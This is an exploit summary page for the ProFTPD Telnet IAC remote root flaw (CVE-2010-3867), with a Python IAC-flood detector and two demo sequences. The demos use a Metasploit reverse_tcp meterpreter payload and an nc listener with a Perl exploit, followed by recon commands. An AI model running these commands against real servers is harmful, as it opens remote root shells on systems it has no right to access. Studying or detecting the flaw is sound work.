CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Timeline :

Vulnerability reported to the vendor by ZDI on 2010-09-24
Coordinated public release of the advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07

PoC provided by :

jduck for the Metasploit exploit
Kingcope for the Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in ProFTPD server versions 1.3.2rc3 through 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
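The trigger condition above (many Telnet IAC sequences on one FTP control-channel line) is easy to spot from the defender's side. The following Python is an added example, not code from the Metasploit module or from ProFTPD: it separates IAC sequences from data on a single line, honouring the IAC IAC escape and the three-byte WILL/WONT/DO/DONT negotiation form, and flags lines whose command count exceeds a threshold. The threshold value and the sample lines are constructed for illustration.

```python
IAC = 0xFF
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE   # RFC 854 option-negotiation commands


def parse_iac(line: bytes):
    """Separate Telnet IAC sequences from data on one control-channel line.
    Returns (commands, literal_ff, data): number of IAC command sequences,
    number of escaped 0xFF data bytes (IAC IAC), and the bytes with all
    IAC sequences stripped."""
    commands = 0
    literal_ff = 0
    data = bytearray()
    i = 0
    while i < len(line):
        b = line[i]
        if b != IAC:
            data.append(b)
            i += 1
            continue
        if i + 1 >= len(line):          # dangling IAC at end of line: count it as a command
            commands += 1
            break
        cmd = line[i + 1]
        if cmd == IAC:                  # IAC IAC escapes a literal 0xFF data byte
            literal_ff += 1
            data.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):   # three-byte form: IAC <cmd> <option>
            commands += 1
            i += 3
        else:                           # two-byte form (NOP, AYT, ...)
            commands += 1
            i += 2
    return commands, literal_ff, bytes(data)


def is_suspicious(line: bytes, max_commands: int = 8) -> bool:
    """True when one line carries more IAC commands than a normal FTP client
    would ever send; max_commands is a constructed example threshold."""
    commands, _, _ = parse_iac(line)
    return commands > max_commands


# Constructed sample lines (not captured traffic)
NORMAL = b"USER anonymous\r\n"
NEGOTIATION = bytes([IAC, DO, 0x01]) + b"PASS guest\r\n"   # one IAC DO ECHO before a command
FLOOD = bytes([IAC, 0xF1]) * 200 + b"\r\n"                  # 200 IAC NOP sequences on one line

if __name__ == "__main__":
    for name, line in (("normal", NORMAL), ("negotiation", NEGOTIATION), ("flood", FLOOD)):
        print(name, parse_iac(line)[0], is_suspicious(line))
```

Run over a packet capture's reassembled control-channel lines, the same check gives a simple signature for this class of traffic against hosts still running an affected version.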

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig